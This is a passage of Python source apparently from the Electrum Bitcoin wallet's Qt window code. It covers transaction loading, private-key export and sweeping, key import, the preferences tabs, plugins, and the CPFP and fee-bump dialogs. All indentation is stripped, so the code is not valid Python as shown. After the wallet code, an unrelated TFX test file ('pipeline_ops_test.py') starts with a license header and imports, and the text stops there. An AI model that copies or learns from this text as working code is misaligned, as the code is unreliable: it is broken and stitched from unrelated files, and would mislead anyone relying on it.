self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
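# Export all wallet private keys. Key derivation runs in a background thread and
# reports progress back to the GUI via computing_privkeys_signal / show_privkeys_signal.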
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
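# Sweep coins controlled by externally supplied private keys into one of the
# wallet's own addresses: the swept UTXOs are loaded into the send tab with the
# destination frozen and the amount locked to the maximum.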
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
#traceback.print_exc(file=sys.stderr)
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
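# Generic import helper: splits the entered text on whitespace, passes the pieces
# to `func`, and reports the first few accepted and rejected inputs.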
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
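# Preferences dialog. Settings are grouped into Fees / Transactions / General /
# Fiat / Identity tabs; most changes are written to the config immediately, while
# language and color theme changes set need_restart.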
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 BTC = 1000 mBTC. 1 mBTC = 1000 bits. 1 bit = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
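# Each tab is a grid of (label, widget) rows; entries whose second element is
# None (standalone checkboxes) span both columns.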
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
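# Child-Pays-For-Parent dialog: builds a child transaction spending an unconfirmed
# output of parent_tx. The suggested fee is fee_per_kb * (parent size + child size) / 1000,
# and fees above the value of the spent output are rejected.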
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
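# RBF fee-bump dialog: suggests 1.5x the original fee, passes the fee increase
# (delta) to wallet.bump_fee(), and optionally marks the replacement as final
# (non-replaceable).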
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee') + ':'))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
pipeline_ops_test.py
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.orchestration.experimental.core.pipeline_ops."""
import copy
import os
import threading
import time
from absl.testing import parameterized
from absl.testing.absltest import mock
import tensorflow as tf
from tfx.dsl.compiler import constants
from tfx.orchestration import metadata
from tfx.orchestration.experimental.core import async_pipeline_task_gen
from tfx.orchestration.experimental.core import mlmd_state
from tfx.orchestration.experimental.core import pipeline_ops
from tfx.orchestration.experimental.core import pipeline_state as pstate
